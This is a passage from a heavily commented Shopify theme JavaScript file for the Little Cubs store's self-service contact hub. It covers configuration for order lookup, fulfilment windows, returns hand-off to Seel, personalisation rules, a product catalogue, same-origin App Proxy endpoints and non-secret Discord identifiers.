/* ===========================================================================
   LITTLE CUBS — SELF-SERVICE CONTACT HUB  ·  assets/contact-hub.js
   ===========================================================================

   THIS IS A PLAIN STATIC ASSET. NOT contact-hub.js.liquid — ON PURPOSE, AND
   THIS IS THE SINGLE MOST IMPORTANT ARCHITECTURAL DECISION IN THE BUILD.

   Shopify runs the Liquid engine over any theme file whose name ends `.liquid`.
   A `.js.liquid` asset is therefore parsed as a template before it is served,
   and every `{{`, `}}`, `{%` and `%}` in it becomes Liquid syntax. JavaScript
   uses all four:

       `${x}` inside a template literal is fine, but `{{` appears the moment you
       write `fn({{a:1}})`, an object inside an object, or a regex like
       /\{\{/ — and `{%` appears in any comment box-drawing, in a modulo
       expression written `a {% b}`… you get the idea.

   The failure mode is not a syntax error you would notice in review. It is a
   silently mangled file served to customers, months later, after somebody adds
   an innocuous line. Keeping this file NON-Liquid makes that class of bug
   structurally impossible: Shopify never looks inside it.

   The corollary — and it is a hard rule, not a preference:

       THERE IS NO LIQUID IN THIS FILE, AND NO APPLICATION LOGIC IN THE SECTION.

   ALL configuration crosses the boundary as exactly ONE JSON document, emitted
   by sections/contact-hub.liquid as:

       <script type="application/json" id="lc-hub-config">…</script>

   which this file reads once at boot and deep-merges over the defaults below
   (see lcApplyBlobConfig). One element, one parse, one seam. If you need a new
   tunable: add a setting to the section schema, add it to that JSON blob, and
   give it a default in the CONFIG object below. Do not add a second blob, do
   not add inline script to the section, and never `{{ … }}` your way into here.

   OTHER STANDING RULES (carried over from the prototype):
     * THE ONLY BACKEND CALLS ARE lookupOrder() AND submitRequest(). Both must
       hit a Shopify App Proxy in front of a server that holds the Admin API
       token. NO TOKEN, EVER, in this file or in any theme file — a storefront
       asset is world-readable. There is no third call and there must not be.
     * The PO Box detector and the personalisation character/length rules are
       UX here. They must ALSO run server-side before anything reaches Discord,
       Notion or the 3PL. Client-side validation is a courtesy, not a guard.
     * The reference implementation is contact-hub.html at the project root.
       Behaviour changes belong there first; this file is its port.
   =========================================================================== */

/* ===========================================================================
   ONE IIFE. Nothing below reaches `window`.

   This file is destined for a Shopify page that already loads a theme and
   several apps. At top level in a classic <script>, `function $()` assigns
   window.$ — silently replacing jQuery on any theme that loads it (Dawn
   derivatives, GemPages) and breaking the header drawer, the cart drawer and
   any app that calls $(document).ready(). CONFIG, State, Router, VIEWS, esc,
   money and lookupOrder are all similarly high-collision names.

   Exactly one deliberate global is exported at the bottom: window.LC_HUB.
   =========================================================================== */
(function () {
"use strict";

/* IDEMPOTENCE GUARD. The theme editor re-renders a section's markup — including
   the <script> tag that loads this file — every time a setting is saved, and
   some Shopify surfaces re-execute it. A second run would register a second
   copy of every document-level listener (so one click would fire two
   navigations) and hand back a second Router racing the first. Booting again is
   handled properly by the `shopify:section:load` listener at the bottom of this
   file; running the whole module again is never right. */
if (window.LC_HUB) return;
/* ===========================================================================
   CONFIG — the single place the client retunes everything.
   =========================================================================== */
var CONFIG = {

  /* THE TYPE SCALE. Both values are section settings; see the long comment at
     the top of contact-hub.css for why every size in the stylesheet is `em`.

     baseSize     px, 14-22. The size body copy renders at, and the unit every
                  other size in the hub is a multiple of. 17 is the shipped
                  design; changing it scales the whole section proportionally.
     headingScale percent, 90-140. Multiplies h1/h2/h3 only, so headings can be
                  balanced against body copy without moving body copy.

     Applied to the #lc-hub element as --lc-base / --lc-heading-scale by
     lcApplyTypeScale(). sections/contact-hub.liquid ALSO writes them straight
     into the element's style attribute, so on a real storefront the correct
     scale is painted before this file runs; this is what makes the standalone
     prototype (and the theme editor's live re-render) behave the same way. */
  type: {
    baseSize: 17,
    headingScale: 100
  },

  store: {
    name: "Little Cubs",
    /* RECORDED, NOT READ. Nothing in this file uses either of these two, and
       that is deliberate rather than an oversight: every link the hub emits is
       a same-origin path (so hard-coding the domain would break the moment the
       page is previewed on a myshopify.com URL), and money() prints "$"
       directly. They stay as the written-down answer to "which store, which
       currency" for whoever wires the Worker — the same status as the Discord
       ids below. If you find yourself wanting to build a URL from `domain`,
       don't: use a leading-slash path. */
    domain: "https://little-cubs.com",
    supportEmail: "info@little-cubs.com",
    currency: "USD",
    orderPrefix: "LC",            // order names are #LC + 5 digits
    orderDigits: 5                // bump to 6 if the counter ever rolls over
  },

  urls: {
    shippingPolicy: "/policies/shipping-policy",
    refundPolicy:   "/policies/refund-policy",
    faqPage:        "/pages/faq",
    /* The legacy store page whose whole body is the old Vimeo iframe. Nothing
       in this file points at it any more (the FAQ link now opens the MP4
       below), but the token stays wired so the client can swap back to the
       page — or reuse it — without a code change. */
    poolTentVideo:  "/pages/pack-up-pool-tent-video",

    /* The client's OWN copy of the pool-tent video, uploaded to Shopify Files.
       This replaced the Vimeo embed: same footage, our CDN, no third party
       setting cookies or counting views on our customers.
       7.28 MB (measured), re-encoded down from the original 43.1 MB. That is a
       reasonable size for a tap-to-play demo, but everything that touches it
       still stays lazy — see lcRenderFaqVideo(), where preload="none" means the
       page downloads none of it until the customer presses play. The FAQ entry
       references this through the %%poolTentVideoFile%% token so the URL exists
       exactly once in the file. */
    poolTentVideoFile: "https://cdn.shopify.com/videos/c/o/v/578998b353f04b57b2c6be177583ce0a.mp4",

    allProducts:    "/collections/all",

    /* THE canonical tracking experience. Already in the main menu, the footer
       menu and every transactional email, so the hub must match it rather than
       invent a second one.

       LINK ONLY — never iframe this. VERIFIED: the app-proxy page renders
       inside the full Shopify theme layout (site header, navigation, footer,
       cookie banner). Embedding it would nest an entire store page inside a
       card: double chrome, two competing navs, broken scrolling on mobile and
       no control over height.

       The legacy /pages/track-your-order is deliberately NOT referenced
       anywhere in this file — it is being retired because its CTAs point at
       ordertracker.com. */
    trackingApp: "https://little-cubs.com/apps/17TRACK",

    /* NO LONGER A PLACEHOLDER. This used to point at the Shopify customer
       account, because self-service returns lived there and that was the best
       route available. The returns flow in this file replaced it, and once
       self-serve returns is switched off in Settings > Customer accounts the
       account page has no returns option on it at all — so pointing customers
       there would send them to a dead end.

       It is now a DEEP LINK into this hub's own returns flow: `?lc=refund-return`
       opens the flow directly, skipping the card grid. That is what makes it
       worth having as a setting rather than deleting it — it is the canonical
       "send someone into returns" URL for emails and FAQ answers, available in
       merchant-editable copy as %%returnsHub%%. */
    returnsHub: "https://little-cubs.com/pages/contact?lc=refund-return",

    /* SEEL'S RESOLUTION CENTRE — the ONLY outbound Seel address in this file.

       Worry-Free Purchase is Seel's product, not ours: Seel open the claim,
       Seel decide it and Seel pay it. So every covered path here HANDS OVER
       rather than pretending to process anything, and it hands over to exactly
       one URL. VERIFIED LIVE: resolve.seel.com serves a "Resolution Center"
       that asks for order details and falls back to Seel's own support address.
       A plain curl gets a 403 off its bot protection — that is the protection
       answering, not a dead link.

       DO NOT swap this for a kover*.zendesk.com help article. Seel was formerly
       Omni and formerly Kover.ai, and their articles still sit on the old
       company's Zendesk; sending a customer there looks like we mistyped a URL.

       Merchant-editable as `url_seel_resolve`, and available in copy as
       %%seelResolve%%, so the client can follow Seel if the address moves
       without waiting on a code change. */
    /* THE PATH IS THE STORE, AND %20 IS NOT OPTIONAL.

       Seel's own dashboard prints this link with a LITERAL SPACE —
       "resolve.seel.com/little cubs" — which is not a valid URL. A raw space in
       an href is truncated by some email clients and mangled by some parsers,
       so it is written encoded here and must stay encoded.

       VERIFIED LIVE, all three loaded in a browser:
         /little%20cubs  -> the form AND "Contact us at info@little-cubs.com"
         /little-cubs    -> a generic form with no store attached
         /sezzle         -> a generic form with no store attached

       The bare domain and the old /sezzle path both render a resolution centre
       that does not know which shop the customer is claiming against, so they
       look like they work and quietly lose the claim. Only the encoded path
       resolves to this store. */
    seelResolve: "https://resolve.seel.com/little%20cubs",

    /* Shopify cart permalink base. The swap picker builds
       `<base>{variantId}:{qty},{variantId}:{qty}` when the replacement basket
       is worth MORE than the item being swapped out.

       STUBBED ON PURPOSE in the prototype: the URL is displayed, never opened.
       Opening it would create a second, unrelated order — the permalink knows
       nothing about the original one, so the customer would pay full price for
       the new items and still be owed the value of the old ones. Reconciling
       the two is a backend job (credit the removed line, apply a matching
       discount code to the new cart, or issue an invoice against the existing
       order). Wire it up only once that exists. */
    cartPermalinkBase: "https://little-cubs.com/cart/"
  },

  /* FULFILMENT MODEL.

     The 3PL is NO LONGER CJ Dropshipping — CJ was the early days only. Orders
     are now pulled by a private supplier running MabangErp3 (a cross-border
     e-commerce ERP that integrates with Shopify, selects logistics and drives
     fulfilment). They fulfil EVERY DAY EXCEPT SUNDAY and invoice daily.

     THE FACT THAT DRIVES THIS WHOLE BLOCK: this 3PL assigns a tracking number
     to the orders it is fulfilling that day, but an assigned tracking number
     does NOT mean the parcel has left the warehouse. Told in time, they can
     OFTEN still intercept it. So "tracking exists" is not terminal — see
     evaluate() and the three-state model (OPEN / TRACKING_ASSIGNED /
     DISPATCHED). The old CJ-derived "one fixed 02:50Z batch" figure is no
     longer representative, which is why the schedule below is CONFIG-driven
     rather than hard-coded. */
  fulfillment: {
    /* INTERNAL / STAFF-FACING ONLY. Never render either of these to a customer:
       naming the carrier invites people to go and argue with the carrier
       directly instead of with us, and it advertises where the parcel starts
       its journey. Customer-facing copy uses CONFIG.copy.carrierGeneric.
       These two values exist so the Discord/Notion side stays accurate. */
    carrier: "YunExpress",
    threePL: "our 3PL (MabangErp3)",

    /* PUBLISHED POLICY, and the only window ever quoted to a customer. Under-
       promising is deliberate. It is a BACKSTOP, never the gate: a fixed 12h
       rule mispredicts roughly half the time, so real fulfilment state decides.
       Do NOT raise this to match interceptWindowHours below — the system tries
       for longer than it promises, which is the right way round. */
    policyWindowHours: 12,

    /* HOW LONG A TRACKING NUMBER STAYS INTERCEPTABLE.
       Measured from the FULFILMENT / TRACKING-ASSIGNMENT timestamp, NOT from
       when the order was placed. Within this window and with no evidence of
       carrier movement the order is TRACKING_ASSIGNED — we ask, honestly, with
       no promise. Beyond it, DISPATCHED. 24h matches the client's real
       historical process (their manual "under 24h -> ask the 3PL on Discord"
       rule), so this is a documented heuristic, not a guess.

       IT IS A STAND-IN. The correct signal is the carrier's FIRST SCAN, which
       17TRACK knows and Shopify does not. When that is wired, set
       order.trackingMovedAt and the clock stops mattering — see
       normaliseOrder() and evaluate(). */
    interceptWindowHours: 24,

    /* DISPATCH SCHEDULE — display only, never a gate.
       dispatchDays uses JS getDay(): 0 = Sunday … 6 = Saturday. Default is
       Mon–Sat, i.e. every day EXCEPT Sunday, so a Saturday-evening order counts
       down to Monday rather than to a Sunday that never happens.
       dispatchCutoffLocal is "HH:MM" wall-clock time in dispatchTimezone; the
       client retunes these two values and nothing else. 15:00 Pacific/Auckland
       is roughly the 02:50Z the old CJ data showed, kept as a sane starting
       point until the new 3PL's own timings have been measured. */
    dispatchDays: [1, 2, 3, 4, 5, 6],
    dispatchCutoffLocal: "15:00",
    dispatchTimezone: "Pacific/Auckland",

    /* FALLBACK ONLY, for a browser with no usable Intl timezone database.
       nextDispatchUtc() uses these to place the cutoff in plain UTC, still
       skipping the non-dispatch days. */
    batchHourUtc: 2,
    batchMinuteUtc: 50
  },

  /* ADDRESS FORM OPTIONS.
     collectCompany matches the client's CURRENT Shopify checkout setting: they
     have disabled the Company field there (which is what Shopify recommends).
     False hides the input on the address form AND the Company row on the review
     comparison — there is no point asking a customer to proof-read a line
     checkout never collected. Flip to true and both come back exactly as they
     were; the PO Box detector still scans the field whenever it exists. */
  address: {
    collectCompany: false
  },

  /* ---------------------------------------------------------------------
     PERSONALISATION (round 5).

     The client is adding personalised products — a kids' backpack with the
     child's name stitched on it. The name is captured on the product page as a
     LINE ITEM PROPERTY (`properties[Name]`), NOT a metafield: a metafield
     describes the product, a line item property is the customer's own input and
     is the thing that lands on the order, the packing slip, the confirmation
     email and the REST `line_items[].properties` array MabangErp3 reads. In
     GraphQL the same data reads back as `lineItem.customAttributes { key value }`
     — see the projection above lookupOrder() and normaliseOrder().

     `enabled` DRIVES THE HUB CARD. Set it false and the "Fix my spelling" card
     disappears from the hub, the FAQ/status shortcuts stop offering it and
     startFlow() refuses the flow — one switch, for a store that has stopped
     selling personalised items, with no code change.

     `collection` IS THE ONE SOURCE OF TRUTH for "which products are
     personalised". The product-page snippet renders its text box only for
     products in this collection, and the swap picker refuses to offer anything
     in it as a replacement (see CONFIG.catalogue.excludeCollection, which
     inherits this handle unless it is deliberately overridden).

     THERE IS NO "CUSTOMISATION STARTED" SIGNAL ANYWHERE IN SHOPIFY, and this
     block does not invent one. The client's rule is "so long as the product
     hasn't begun customisation"; the honest implementation is to gate on the
     same fulfilment state machine as every other amendment flow and to say
     plainly, in the copy, that the stitching may already have started and the
     packing team has to confirm. Do not add a field here that pretends to know. */
  personalisation: {
    enabled: true,
    collection: "personalised",

    /* The property key set on the product page. MUST match the snippet's
       `properties[Name]` input exactly, and must NOT start with an underscore —
       a leading `_` hides the property from cart, checkout and most downstream
       apps, which is the opposite of what this feature needs. */
    propertyKey: "Name",

    /* Hard limit, matching `maxlength="10"` on the product page. Enforced again
       here because a customer editing a spelling must not be able to submit
       something the embroidery template cannot hold.
       CLIENT-SIDE IS UX, NOT A GUARD: the backend must re-check both the length
       and the character rules below before anything reaches the 3PL. */
    maxLength: 10
  },

  /* There is deliberately no `tracking` block any more. The third-party embed
     (script widget, raw iframe, postMessage height watchdog and deep-link
     fallback) has been removed outright: the hub now shows OUR OWN sanitised
     status summary and hands off to CONFIG.urls.trackingApp. Net effect — this
     page makes no outbound request to anything but cdn.shopify.com, and none
     at all until a customer opens the swap picker or presses play. */

  /* POSTER FRAME for the self-hosted FAQ video (CONFIG.urls.poolTentVideoFile).
     A still exported from the video and uploaded to Shopify Files — a
     cdn.shopify.com image URL, nothing else, so no new outbound host.
     Empty is a supported state, not a broken one: with no poster the player
     renders the styled placeholder panel built in lcRenderFaqVideo() (pale sky
     box, mint play badge, real <button>) instead of an empty black rectangle.
     Either way the box reserves its 16:9 height up front, so nothing on the
     page moves when the frame appears.
     A per-FAQ-entry `video.poster` overrides this for that one entry. */
  faqVideoPoster: "https://cdn.shopify.com/s/files/1/0528/8476/6897/files/Fold_Down_Tent-poster.jpg?v=1785724870",

  /* Backend endpoints. Both are same-origin Shopify App Proxy paths in front of
     a Cloudflare Worker that holds the Admin token. */
  api: {
    lookupUrl: "/apps/help/order-lookup",
    /* The photo upload endpoint. Same App Proxy, same Worker, same rule as the
       two below it: a SAME-ORIGIN path, never a URL with a token in it. */
    evidenceUrl: "/apps/help/return-evidence",
    chooseUrl: "/apps/help/choose-resolution",
    /* "Did this sort it out?" — the hub rating. INTERNAL ONLY. This endpoint
       records a 1-5 and an optional sentence against the claim's own row. It
       is not a review ask and must never become one: see the header of
       worker/src/rating.js for why pointing an unhappy customer at a public
       review platform at this exact moment is the worst possible timing. */
    rateUrl: "/apps/help/rate-resolution",
    /* THE SECOND AND LAST BACKEND CALL — see the banner above submitRequest().
       Until this existed, all four submit handlers were setTimeout stubs: a
       customer could finish a flow, be given a request id, and nothing had left
       the browser. Same App Proxy, same Worker, same no-token rule. */
    submitUrl: "/apps/help/submit-request",
    /* The prototype's mock switch `api.useMock` and its 900ms of fake
       latency are GONE from the theme build: there is no mock data in this
       file to switch to, and a live storefront that can be flipped into
       serving fictional orders is a support incident waiting to happen.
       Recorded here rather than silently dropped, so nobody porting a later
       change across from contact-hub.html wonders where they went. */
  },

  debug: {
    /* FALSE IN THE THEME. The Discord/Notion previews on the success screen name
       the 3PL, the internal channel and the Notion workflow columns; that is a
       development aid, not something to show a customer. It is a section
       setting ("Show internal Discord/Notion previews") so it can be flipped on
       temporarily in a password-protected preview theme and flipped back. */
    showInternalPreviews: false
  },

  /* ---------------------------------------------------------------------
     VISIBILITY TOGGLES — one boolean per discrete, genuinely optional block
     of UI. Every one of them is a section checkbox and every one of them
     DEFAULTS TO TRUE, i.e. to exactly what the hub renders today, so
     upgrading the theme changes nothing on screen until someone unticks
     something.

     READ THROUGH shown(), NEVER DIRECTLY. shown() treats anything that is not
     an explicit `false` as "show", so a merchant on an older section that does
     not emit one of these keys, or a hand-edited blob that drops one, keeps the
     block rather than losing it silently.

     THESE ONLY EVER REMOVE. No toggle adds a control to a screen that does not
     already have it, and in particular NONE of them can put a returns CTA in
     front of a cancel / address-change / fix-spelling customer whose order has
     shipped, is part-shipped, or is labelled-not-moved. That rule lives in
     ineligibleCard()'s `offerReturns` and nothing here reads or writes it.

     Where switching one off would leave a screen with no action or no
     explanation, the render code degrades — see the comment at each site:

       header        the hub's own title bar. Gated in the SECTION as well
                     (`show_header`), so on a storefront the markup is never
                     emitted; this flag is what makes the standalone prototype
                     and the theme editor's live re-render behave the same.
       orderSummary  the "Order #LC12345" recap card. The order is still named
                     on every in-flow screen by the session chip in backBar().
       parcelCard    the "Your parcel" card on a TRACKABLE order. Hiding it
                     leaves the track button + hand-off note behind, because
                     that is the whole point of the screen for a shipped order.
       timeline      the "Your order's journey" card. Explanation only.
       countdown     the "Waiting to be packed" card. If the timeline is hidden
                     too, the plain sentence is kept — otherwise an unfulfilled
                     customer is told nothing at all about why there is no
                     tracking number, which is ~47% of live orders.
       statusReturns the "Anything else about this order?" panel. On ON_HOLD /
                     UNCONFIRMED its contents are the only explanation on the
                     screen, so that sentence is kept without the card.
       faqSearch     the search box in the "Something else?" card.
       faqHuman      the "I still need help from a person" button under it.
                     With BOTH off the card has nothing in it, so the card is
                     dropped and the "Ask a question" hub tile with it.
     --------------------------------------------------------------------- */
  show: {
    header:        true,
    orderSummary:  true,
    parcelCard:    true,
    timeline:      true,
    countdown:     true,
    statusReturns: true,
    faqSearch:     true,
    faqHuman:      true
  },

  /* ---------------------------------------------------------------------
     HUB CARDS — the six destinations on the front screen, and their icons.

     ORDER IS DISPLAY ORDER, and it is deliberate: "Where's my order?" first
     because it is the single most common reason anyone opens a contact page,
     then the two time-critical fixes, then the slower routes.

     `id` maps 1:1 to a flow id in FLOWS and to `action.target` in the FAQ
     entries. Renaming one means renaming all three.

     `icon` names one of the <template data-lc-icon="…"> entries rendered by
     snippets/contact-hub-icons.liquid, and is a select in the theme editor.
     `tone` picks the circle behind it:
     "mint" or "sky", both straight out of the approved palette, alternating so
     the grid reads as friendly rather than as six identical tiles.

     `image` is the OPTIONAL escape hatch the client asked for: set it to an
     image URL (a cdn.shopify.com file — lifestyle photography, an illustration)
     and it REPLACES the icon on that card, no code change. Default is empty on
     every card, i.e. icons. The image is decorative like the icon it replaces,
     so it renders with alt="" and the card's own text stays the label.
     --------------------------------------------------------------------- */
  hubCards: [
    /* NOT "see live tracking and exactly where your parcel is right now". The
       tracking embed was removed rounds ago — this screen renders our own
       summary and links out — and roughly 47% of live orders are unfulfilled,
       so about half the people who tap this card have no tracking number at
       all. "Exactly where your parcel is right now" is precisely the
       expectation that makes someone email when it is not met. */
    { id:"order-status",   icon:"parcel", tone:"sky",  image:"",
      t:"Where's my order?",
      d:"Check what stage your order is at, and get your tracking number as soon as there is one." },

    { id:"address-change", icon:"pin",    tone:"mint", image:"",
      t:"Change shipping address",
      /* "before your order is packed" was stricter than the three-state model —
         a packed-and-labelled order is now accepted as a request. */
      d:"Moved, or typed something wrong? Fix it before your order leaves us." },

    { id:"cancel-order",   icon:"undo",   tone:"sky",  image:"",
      t:"Cancel my order",
      d:"Changed your mind? We'll check straight away whether it can still be stopped." },

    { id:"amend-order",    icon:"swap",   tone:"mint", image:"",
      t:"Change what I ordered",
      d:"Wrong colour, wrong size, or ordered two by mistake." },

    /* PERSONALISATION (round 5). `requires:"personalisation"` is read by
       hubCardVisible(): the card renders only while
       CONFIG.personalisation.enabled is true, so a store that stops selling
       personalised items switches one boolean rather than editing this array.
       It sits immediately after "Change what I ordered" because it is the same
       kind of request (change the order before it goes out) and the same kind
       of urgency — and directly above the slower routes. */
    { id:"fix-spelling",   icon:"stitch", tone:"sky",  image:"",
      requires:"personalisation",
      t:"Fix my spelling",
      d:"Got a letter wrong on a personalised item? Change it before we stitch it." },

    /* The destination is a page of instructions and an email address, not a
       claim form with an upload box — the label must not imply otherwise. */
    { id:"refund-return",  icon:"return", tone:"mint", image:"",
      t:"Returns & refunds",
      d:"How to send something back, or report that it arrived damaged." },

    /* Titled "Ask a question", NOT "Something else": the section immediately
       below it — the client's own "Something else?" search box — carries that
       wording, and the two rendered about 40px apart with nothing between them.
       For an older reader scanning for the right door, the same words twice
       reads as a duplicate or a mis-render and hides the fact that the card
       takes you to the thing directly underneath it. */
    { id:"something-else", icon:"chat",   tone:"sky",  image:"",
      t:"Ask a question",
      d:"Search our answers below, or reach a real person." }
  ],

  /* Maps a Shopify line item title to a Notion `Product` multi-select option.

     THE TWO PERSONALISED BACKPACKS ARE DELIBERATELY ABSENT. `Product` is a
     multi_select, and Notion REJECTS a value that is not already an option on
     the property — adding the titles here would not create the options, it
     would make the whole page-creation call fail, so a spelling-change task
     would silently never appear on the board. Unmapped titles fall through to
     "Unknown" in notionProducts(), which is a real option and does reach the
     board.
     RECOMMEND TO THE CLIENT: add the two backpacks as `Product` options once
     the products are published, then add them here. Until then the Task title
     and Request Summary carry the item name in full, so nothing is lost. */
  productMap: {
    "Little Cubs Pop-Up Pool Tent": "Little Cubs Pop-Up Pool Tent",
    "Early Learning Audible Flashcards (224 Words!)": "Little Cubs Flash Cards",
    "Little Cubs Tracing Pad": "Little Cubs Tracing Pad",
    "Little Cubs Domino Train": "Little Cubs Domino Train",
    "Sleep Sweet Plushy": "Sleep Sweet Plushy",
    "Little Cubs SPF50 Sun Hat": "Little Cubs SPF50 Sun Hat"
  },

  /* Real ACTIVE catalogue — powers the amendment "swap it for something else"
     product picker. Verified live against Shopify.

     ORDER MATTERS. The array order is the display order of the default cards
     and reflects real sales prominence: Pool Tent (the only line item in ~28
     of the last 30 orders), then Flashcards, Tracing Pad, Domino Train,
     Sleep Sweet Plushy, Sun Hat.

     PRICE LIVES ON THE VARIANT, not the product: the Domino Train is 29.99 for
     60 dominos and 35.99 for 120. A single product-level price quoted the 120s
     $6 under on a screen that then builds a real cart permalink from it.
     `price` on the product is the FROM price, used on the card only.

     `available` gates selection. The SPF50 Sun Hat is 0 inventory on every
     variant today, so it renders greyed out and unselectable rather than
     vanishing — customers ask for it, and a missing product reads as a bug.
     Flip `available:true` (product and variants) to put it back on sale; the
     picker needs no other change.

     `image` is the product's main Shopify CDN image. Together with the FAQ
     video (and any optional CONFIG.hubCards[].image) these are the ONLY
     outbound requests this page makes, all to cdn.shopify.com, and in
     production the page is served from little-cubs.com and pulls the same CDN.
     Every card image is loading="lazy" with an onerror fallback tile.

     `keywords` exists because the search reuses the FAQ stemmer, which will
     not get from "cards" to "flashcards" (it is a prefix of nothing) or from
     "dominoes" to "Domino". These are the words customers actually type.

     `collections` is the product's collection membership, as an array of
     HANDLES. In the Shopify build it is populated from real collection
     membership; here it is written out so the swap-picker exclusion below is
     demonstrable from the dev bar. An entry with no `collections` array is
     treated as belonging to nothing, which is the safe default — a product is
     only ever excluded by being explicitly listed.

     Seel "Worry-Free Purchase" is deliberately absent — it is purchase
     protection, not a toy, and must never be swappable or addable. */
  catalogue: {

    /* ROUND 5, THE CLIENT'S DECISION: the swap picker's exclusion list is
       driven by a COLLECTION, not by a hard-coded list of product ids. Any
       catalogue entry whose `collections` array contains this handle can never
       be offered as a replacement in the amendment flow.

       WHY PERSONALISED PRODUCTS MUST NEVER BE A SWAP TARGET: the picker builds
       a basket with no way to capture a name, so swapping into a personalised
       backpack would send the 3PL an embroidered item with nothing to embroider
       — and the customer would have agreed to it without ever being asked for a
       spelling.

       EMPTY MEANS "INHERIT CONFIG.personalisation.collection", which is the
       usual case and keeps ONE source of truth for "which products are
       personalised" (see the assignment immediately after this object literal).
       Set an explicit handle here only if the swap exclusion ever needs to be a
       DIFFERENT, wider collection than the personalised one — e.g. a
       "not-swappable" collection also covering bundles or gift cards. */
    excludeCollection: "",

    items: [
    { id:"pool-tent",
      title:"Little Cubs Pop-Up Pool Tent",
      price:35.99, available:true, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/files/LC-PT-Main_3.webp?v=1725418552",
      keywords:["pool","tent","paddling","shade","popup","pop up","water"],
      variants:[
        { id:"42896083583153", title:"1 Pool Tent", price:35.99, available:true } ] },

    { id:"flashcards",
      title:"Early Learning Audible Flashcards (224 Words!)",
      price:22.99, available:true, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/files/FlashCards-Main_Blue.webp?v=1727171931",
      keywords:["flash","cards","flashcard","talking","audible","words","learning","speech","abc"],
      variants:[
        { id:"42982935167153", title:"Blue", price:22.99, available:true },
        { id:"42982935232689", title:"Pink", price:22.99, available:true } ] },

    { id:"tracing-pad",
      title:"Little Cubs Tracing Pad",
      price:35.99, available:true, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/files/LC-TracingTablet-Main_1.webp?v=1735698206",
      keywords:["tracing","pad","tablet","drawing","draw","writing","light","board"],
      variants:[
        { id:"45009722966193", title:"Default", price:35.99, available:true } ] },

    { id:"domino-train",
      title:"Little Cubs Domino Train",
      price:29.99, available:true, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/products/Green_Main.jpg?v=1667289662",
      keywords:["domino","dominoes","dominos","train","building","stacking","blocks"],
      variants:[
        { id:"42284761579697", title:"Green / 60 Dominos",  price:29.99, available:true },
        { id:"42284761514161", title:"Green / 120 Dominos", price:35.99, available:true },
        { id:"42284761612465", title:"Pink / 60 Dominos",   price:29.99, available:true },
        { id:"42284761546929", title:"Pink / 120 Dominos",  price:35.99, available:true } ] },

    { id:"sleep-sweet-plushy",
      title:"Sleep Sweet Plushy",
      price:29.99, available:true, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/files/BP-Lifestyle_6.webp?v=1732157400",
      keywords:["plushy","plush","soft","toy","teddy","sleep","night","light","koala","otter","bunny"],
      variants:[
        { id:"44910867808433", title:"Koala", price:29.99, available:true },
        { id:"44910867841201", title:"Otter", price:29.99, available:true },
        { id:"44910867873969", title:"Bunny", price:29.99, available:true } ] },

    /* OUT OF STOCK on every variant — shown, but not selectable. */
    { id:"sun-hat",
      title:"Little Cubs SPF50 Sun Hat",
      price:21.99, available:false, collections:[],
      image:"https://cdn.shopify.com/s/files/1/0528/8476/6897/products/SunHat-Blue-V2.jpg?v=1635988926",
      keywords:["sun","hat","spf","spf50","summer","uv","cap","beach"],
      variants:[
        { id:"41064467529905", title:"Blue / Infant",  price:21.99, available:false },
        { id:"44891222016177", title:"Blue / Toddler", price:21.99, available:false },
        { id:"41064467562673", title:"Pink / Infant",  price:21.99, available:false },
        { id:"44891222048945", title:"Pink / Toddler", price:21.99, available:false } ] },

    /* ---------------------------------------------------------------------
       THE PERSONALISED PRODUCTS (round 5). Both are DRAFT in Shopify today.

       THEY ARE LISTED HERE PRECISELY SO THEY CAN BE EXCLUDED. Leaving them out
       of the catalogue would hide the exclusion rather than demonstrate it: the
       picker would happen not to show them, and nobody would find out whether
       excludeCollection actually works until a real personalised product went
       live and started appearing as a swap target. With them in the array and
       `collections:["personalised"]` on both, swapBuildIndex() has something to
       refuse, and the dev bar shows it refusing.

       TITLES AND VARIANT IDS ARE PLACEHOLDERS derived from the two draft
       handles the client gave us — `personalized-hand-embroidered-lightweight-
       backpack` and `personalized-cute-corduroy-large-capacity-harajuku-style-
       backpack`. TO CONFIRM BEFORE LAUNCH: the real titles, prices and variant
       ids once the products are published. Nothing behaves differently either
       way — these two never render.
       --------------------------------------------------------------------- */
    { id:"personalised-embroidered-backpack",
      title:"Personalised Hand-Embroidered Lightweight Backpack",
      price:34.99, available:true, collections:["personalised"],
      image:"",
      keywords:["backpack","bag","personalised","personalized","embroidered","name","school"],
      variants:[
        { id:"PLACEHOLDER-EMB-1", title:"Sage / One size", price:34.99, available:true } ] },

    { id:"personalised-corduroy-backpack",
      title:"Personalised Corduroy Large-Capacity Backpack",
      price:39.99, available:true, collections:["personalised"],
      image:"",
      keywords:["backpack","bag","personalised","personalized","corduroy","name","school"],
      variants:[
        { id:"PLACEHOLDER-COR-1", title:"Cream / One size", price:39.99, available:true } ] }
    ]
  },

  /* Seel "Worry-Free Purchase" is purchase protection, NOT a toy.
     It is never offered for cancel/amend/refund; it ticks a Notion checkbox. */
  seel: { sku: "SEEL-WFP", vendor: "Seel", title: "Worry-Free Purchase" },

  /* ---------------------------------------------------------------------
     DISCORD — formats required verbatim by the client. Each returns a plain
     string; `c` is the context object built by buildDiscordContext().
     --------------------------------------------------------------------- */
  discord: {
    /* The REAL channel name, verified against channelId below by a read-only
       check against the Discord API (nothing was posted). It used to read
       "#3pl-requests", which was a guess: the id and the name disagreed, and
       this string is what the internal preview prints, so staff comparing the
       preview against Discord were being shown a channel that does not exist. */
    channel: "#little-cubs",

    /* ---------------------------------------------------------------------
       DISCORD IDENTIFIERS — client's dedicated bot, separate from their
       existing "Hermes" agent.

       VERIFIED (read-only checks — nothing was posted):
       - bot username ClaudeAI, id 1533596762650972290, which matches the
         application id below;
       - it can read channel 1506808810118058276, whose name is #little-cubs;
       - that channel lives in guild (server) 1506808809450897468.

       BOTH VALUES BELOW ARE NON-SECRET. An application id and a channel id are
       snowflakes: they identify, they do not authorise. They are safe in a
       page that ships to the public storefront. The guild id above is the same
       kind of value; it is recorded here rather than used, because nothing in
       this file addresses Discord by server.

       WHAT IS NOT HERE, AND MUST NEVER BE:
       - The BOT TOKEN. That is the secret, it is the one credential that can
         post as the bot, and it lives ONLY server-side — in the project's .env
         as DISCORD_BOT_TOKEN, read by the Cloudflare Worker behind the App
         Proxy. It is not in this file, not in any placeholder in this file, and
         must never be: a storefront page is world-readable, so a token pasted
         here is a token published. If one ever does appear, rotate it in the
         Discord developer portal immediately — publishing it is the same as
         publishing the bot.
